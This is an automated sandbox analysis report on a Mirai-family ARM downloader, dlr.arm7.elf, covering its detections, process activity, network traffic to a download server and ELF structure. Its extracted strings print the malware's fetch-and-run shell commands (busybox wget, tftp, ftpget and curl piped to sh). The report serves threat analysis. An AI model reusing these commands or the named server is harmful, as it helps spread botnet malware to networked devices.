Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
dlr.arm7.elf

Overview

General Information

Sample name:dlr.arm7.elf
Analysis ID:1579241
MD5:cdfd53aabdef3ce47672947cf77af27d
SHA1:e84b15ef9cf2e4f9963a7ca4c24483b247f29d43
SHA256:c696f97610eb4807375e193d8e51092f7936b069353d49efc29bb3596886ac4f
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:56
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Yara detected Mirai
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1579241
Start date and time:2024-12-21 06:41:07 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 45s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:dlr.arm7.elf
Detection:MAL
Classification:mal56.troj.linELF@0/1@0/0
  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Command:/tmp/dlr.arm7.elf
PID:6234
Exit Code:5
Exit Code Info:
Killed:False
Standard Output:
NIGGY
RAY
Standard Error:
  • system is lnxubuntu20
  • dash New Fork (PID: 6220, Parent: 4331)
  • rm (PID: 6220, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.Y1zb2WiuS9 /tmp/tmp.ntg6DNPAoh /tmp/tmp.IDcHjvtM8y
  • dash New Fork (PID: 6221, Parent: 4331)
  • rm (PID: 6221, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.Y1zb2WiuS9 /tmp/tmp.ntg6DNPAoh /tmp/tmp.IDcHjvtM8y
  • dlr.arm7.elf (PID: 6234, Parent: 6155, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/dlr.arm7.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
/tmp/GalaxyJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: dlr.arm7.elfReversingLabs: Detection: 44%
    Source: Galaxy.16.drString: incorrectinvalidbadwrongfaildeniederrorretryenableshellshlinuxshellping ;shusage: busybox/bin/busybox hostname Kamru/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0
    Source: global trafficHTTP traffic detected: GET /arm7 HTTP/1.0Data Raw: 00 00 52 41 59 0a 00 00 00 00 00 00 Data Ascii: RAY
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: global trafficHTTP traffic detected: GET /arm7 HTTP/1.0Data Raw: 00 00 52 41 59 0a 00 00 00 00 00 00 Data Ascii: RAY
    Source: Galaxy.16.drString found in binary or memory: http:///curl.sh
    Source: Galaxy.16.drString found in binary or memory: http:///wget.sh
    Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
    Source: ELF static info symbol of initial sample.symtab present: no
    Source: classification engineClassification label: mal56.troj.linELF@0/1@0/0
    Source: /usr/bin/dash (PID: 6220)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.Y1zb2WiuS9 /tmp/tmp.ntg6DNPAoh /tmp/tmp.IDcHjvtM8yJump to behavior
    Source: /usr/bin/dash (PID: 6221)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.Y1zb2WiuS9 /tmp/tmp.ntg6DNPAoh /tmp/tmp.IDcHjvtM8yJump to behavior
    Source: /tmp/dlr.arm7.elf (PID: 6234)File written: /tmp/GalaxyJump to dropped file
    Source: /tmp/dlr.arm7.elf (PID: 6234)Queries kernel information via 'uname': Jump to behavior
    Source: dlr.arm7.elf, 6234.1.00007ffc4cace000.00007ffc4caef000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/dlr.arm7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/dlr.arm7.elf
    Source: dlr.arm7.elf, 6234.1.0000556062087000.00005560621b5000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
    Source: dlr.arm7.elf, 6234.1.00007ffc4cace000.00007ffc4caef000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
    Source: dlr.arm7.elf, 6234.1.0000556062087000.00005560621b5000.rw-.sdmpBinary or memory string: b`U!/etc/qemu-binfmt/arm

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: /tmp/Galaxy, type: DROPPED

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: /tmp/Galaxy, type: DROPPED
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid AccountsWindows Management Instrumentation1
    Scripting
    Path Interception1
    File Deletion
    OS Credential Dumping11
    Security Software Discovery
    Remote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    No configs have been found
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Number of created Files
    • Is malicious
    • Internet
    SourceDetectionScannerLabelLink
    dlr.arm7.elf45%ReversingLabsLinux.Backdoor.Mirai
    SourceDetectionScannerLabelLink
    /tmp/Galaxy37%ReversingLabsLinux.Backdoor.Mirai
    /tmp/Galaxy32%VirustotalBrowse
    No Antivirus matches
    No Antivirus matches
    No contacted domains info
    NameSourceMaliciousAntivirus DetectionReputation
    http:///wget.shGalaxy.16.drfalse
      high
      http:///curl.shGalaxy.16.drfalse
        high
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        37.44.238.94
        unknownFrance
        49434HARMONYHOSTING-ASFRfalse
        109.202.202.202
        unknownSwitzerland
        13030INIT7CHfalse
        91.189.91.43
        unknownUnited Kingdom
        41231CANONICAL-ASGBfalse
        91.189.91.42
        unknownUnited Kingdom
        41231CANONICAL-ASGBfalse
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        37.44.238.94dlr.mips.elfGet hashmaliciousMiraiBrowse
        • /mips
        dlr.mpsl.elfGet hashmaliciousMiraiBrowse
        • /mpsl
        dlr.arm6.elfGet hashmaliciousUnknownBrowse
        • /arm6
        109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
        • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
        91.189.91.43dlr.mips.elfGet hashmaliciousMiraiBrowse
          m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
            dlr.arm6.elfGet hashmaliciousUnknownBrowse
              mips.elfGet hashmaliciousMiraiBrowse
                la.bot.arc.elfGet hashmaliciousMiraiBrowse
                  boatnet.i686.elfGet hashmaliciousMiraiBrowse
                    boatnet.x86_64.elfGet hashmaliciousMiraiBrowse
                      boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                        boatnet.arm.elfGet hashmaliciousMiraiBrowse
                          arm6.elfGet hashmaliciousMiraiBrowse
                            91.189.91.42dlr.mips.elfGet hashmaliciousMiraiBrowse
                              m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                dlr.arm6.elfGet hashmaliciousUnknownBrowse
                                  mips.elfGet hashmaliciousMiraiBrowse
                                    la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                      boatnet.i686.elfGet hashmaliciousMiraiBrowse
                                        boatnet.x86_64.elfGet hashmaliciousMiraiBrowse
                                          boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                            boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                              arm6.elfGet hashmaliciousMiraiBrowse
                                                No context
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                CANONICAL-ASGBdlr.mips.elfGet hashmaliciousMiraiBrowse
                                                • 91.189.91.42
                                                m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 91.189.91.42
                                                dlr.arm6.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                mips.elfGet hashmaliciousMiraiBrowse
                                                • 91.189.91.42
                                                la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                                • 91.189.91.42
                                                boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                • 185.125.190.26
                                                boatnet.i686.elfGet hashmaliciousMiraiBrowse
                                                • 91.189.91.42
                                                boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                • 185.125.190.26
                                                boatnet.x86_64.elfGet hashmaliciousMiraiBrowse
                                                • 91.189.91.42
                                                boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                                • 91.189.91.42
                                                CANONICAL-ASGBdlr.mips.elfGet hashmaliciousMiraiBrowse
                                                • 91.189.91.42
                                                m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 91.189.91.42
                                                dlr.arm6.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                mips.elfGet hashmaliciousMiraiBrowse
                                                • 91.189.91.42
                                                la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                                • 91.189.91.42
                                                boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                • 185.125.190.26
                                                boatnet.i686.elfGet hashmaliciousMiraiBrowse
                                                • 91.189.91.42
                                                boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                • 185.125.190.26
                                                boatnet.x86_64.elfGet hashmaliciousMiraiBrowse
                                                • 91.189.91.42
                                                boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                                • 91.189.91.42
                                                INIT7CHdlr.mips.elfGet hashmaliciousMiraiBrowse
                                                • 109.202.202.202
                                                m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 109.202.202.202
                                                dlr.arm6.elfGet hashmaliciousUnknownBrowse
                                                • 109.202.202.202
                                                mips.elfGet hashmaliciousMiraiBrowse
                                                • 109.202.202.202
                                                la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                                • 109.202.202.202
                                                boatnet.i686.elfGet hashmaliciousMiraiBrowse
                                                • 109.202.202.202
                                                boatnet.x86_64.elfGet hashmaliciousMiraiBrowse
                                                • 109.202.202.202
                                                boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                                • 109.202.202.202
                                                boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                • 109.202.202.202
                                                arm6.elfGet hashmaliciousMiraiBrowse
                                                • 109.202.202.202
                                                HARMONYHOSTING-ASFRdlr.mips.elfGet hashmaliciousMiraiBrowse
                                                • 37.44.238.94
                                                dlr.mpsl.elfGet hashmaliciousMiraiBrowse
                                                • 37.44.238.94
                                                dlr.arm6.elfGet hashmaliciousUnknownBrowse
                                                • 37.44.238.94
                                                8k1e14tjcx.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                • 37.44.238.250
                                                roze.sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 37.44.238.73
                                                roze.armv4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 37.44.238.73
                                                roze.ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 37.44.238.73
                                                roze.mipsel.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 37.44.238.73
                                                roze.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 37.44.238.73
                                                roze.i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 37.44.238.73
                                                No context
                                                No context
                                                Process:/tmp/dlr.arm7.elf
                                                File Type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                Category:dropped
                                                Size (bytes):106060
                                                Entropy (8bit):6.200626875014697
                                                Encrypted:false
                                                SSDEEP:3072:3a5Pkx2Lpn7P5apltywgL+vDIjieXv/lPniAOt+:3aex2FD5apltywgKvWie//xi+
                                                MD5:E54880D9F426BE1C471EB3CB582C7FB6
                                                SHA1:3A8FBD6D902683554C5BAE1DA1EAF0CF5B9C555E
                                                SHA-256:CDFC72CFCD8DDF78BE2B8895442EA5088928F7EB3864B2506E3D1DBB3E641C9D
                                                SHA-512:25FAC8C00D31AF6C39EDFEC6223034CFA2F7C306DD984F2137400BD54FE4FF59D7775CC26109A897ABA93CB69C791D7F2AE85C8B977FB8A736FA266B1C3A8B84
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Source: /tmp/Galaxy, Author: Joe Security
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 37%
                                                • Antivirus: Virustotal, Detection: 32%, Browse
                                                Reputation:low
                                                Preview:.ELF..............(.........4...|.......4. ...(........p.................................................................................b..........................................Q.td..................................-...L.................@-.,@...0....S..... 0....S........../..0...0...@..../.............-.@0....S...M.8...8......../.0....0....S.....$0....S....../........../................................. ... -...-.......-......0..'>..6..|...|.......G-......p.......... `..&;....p..0...0....P..P...P....U......G..../..;....p..@........P.....$...{<..."......b".......8..'<..: ..l0........P.....`0...........0....S.. ...............0....S...... ....R..........8........... ...0.........../.............P..@-..@.......0....S.................0....R...............P..............@..../.......P.........; ...@.......O-...Q...M..@...P..........O..../.........!<.. 4...,...4....T.......... ....T.. ............Y......1...`...pD...W....:.........3.......0f...........C.. ... ...0P..pG..0..
                                                File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                Entropy (8bit):4.804175351453634
                                                TrID:
                                                • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                File name:dlr.arm7.elf
                                                File size:1'488 bytes
                                                MD5:cdfd53aabdef3ce47672947cf77af27d
                                                SHA1:e84b15ef9cf2e4f9963a7ca4c24483b247f29d43
                                                SHA256:c696f97610eb4807375e193d8e51092f7936b069353d49efc29bb3596886ac4f
                                                SHA512:52ac3c8c348890388ec97794be7237c7f6cf5664edde7081f99dd68657457d3994bbada6ccb76c781dec1a206dcead3ce57c3b5239a35f145cc03ba49d529ad7
                                                SSDEEP:24:uTcRKGpa7Urz/jlfanXK1hH9Vev3gRGaJ9ixBBuLla9gjSq:uARKGpa7UrLZa8I+JCBu4Zq
                                                TLSH:0131DCA1A7D09EBDC8F491BE9E5B0310B3789F00E0C73222830C63696D1AE3C9D2744A
                                                File Content Preview:.ELF..............(.........4...........4. ...(.....................`...`...............`...`...`.......................`...`...`...................Q.td.........................................8...<...4...........(.."...#...../...-.......M................

                                                ELF header

                                                Class:ELF32
                                                Data:2's complement, little endian
                                                Version:1 (current)
                                                Machine:ARM
                                                Version Number:0x1
                                                Type:EXEC (Executable file)
                                                OS/ABI:UNIX - System V
                                                ABI Version:0
                                                Entry Point Address:0x83ac
                                                Flags:0x4000002
                                                ELF Header Size:52
                                                Program Header Offset:52
                                                Program Header Size:32
                                                Number of Program Headers:4
                                                Section Header Offset:1208
                                                Section Header Size:40
                                                Number of Section Headers:7
                                                Header String Table Index:6
                                                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                NULL0x00x00x00x00x0000
                                                .textPROGBITS0x80c00xc00x3600x00x6AX0016
                                                .rodataPROGBITS0x84200x4200x400x10x32AMS004
                                                .tbssNOBITS0x104600x4600x80x00x403WAT004
                                                .gotPROGBITS0x104600x4600x100x40x3WA004
                                                .ARM.attributesARM_ATTRIBUTES0x00x4700x140x00x0001
                                                .shstrtabSTRTAB0x00x4840x340x00x0001
                                                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                LOAD0x00x80000x80000x4600x4605.20990x5R E0x8000.text .rodata
                                                LOAD0x4600x104600x104600x100x100.33730x6RW 0x8000.tbss .got
                                                TLS0x4600x104600x104600x00x80.00000x4R 0x4.tbss
                                                GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 21, 2024 06:41:55.324743032 CET43928443192.168.2.2391.189.91.42
                                                Dec 21, 2024 06:41:55.567756891 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:55.687736988 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:55.687854052 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:55.688851118 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:55.809070110 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:56.959016085 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:56.959089994 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:56.959126949 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:56.959150076 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:56.959150076 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:56.959163904 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:56.959203005 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:56.959209919 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:56.959209919 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:56.959239006 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:56.959243059 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:56.959280014 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:56.959284067 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:56.959343910 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:56.959470034 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:56.959505081 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:56.959513903 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:56.959541082 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:56.959556103 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:56.959583998 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.079051018 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.079101086 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.079111099 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.079139948 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.083034039 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.083074093 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.151048899 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.151094913 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.151377916 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.151426077 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.155273914 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.155333996 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.155391932 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.163737059 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.163814068 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.165098906 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.172038078 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.172147989 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.173688889 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.180481911 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.180538893 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.180634022 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.188860893 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.189160109 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.190532923 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.197283030 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.197391987 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.198848963 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.205739975 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.205900908 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.207216978 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.217747927 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.217787027 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.218839884 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.223189116 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.223225117 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.223773003 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.230197906 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.230272055 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.230407953 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.237874985 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.280452967 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.343156099 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.343265057 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.343993902 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.345608950 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.345803976 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.347364902 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.349427938 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.349525928 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.350625992 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.354429007 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.354482889 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.355608940 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.359266996 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.359338999 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.360512972 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.364137888 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.364306927 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.365489006 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.368793011 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.368944883 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.370592117 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.373488903 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.373625040 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.374128103 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.378200054 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.378249884 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.379364014 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.382965088 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.383018970 CET804268637.44.238.94192.168.2.23
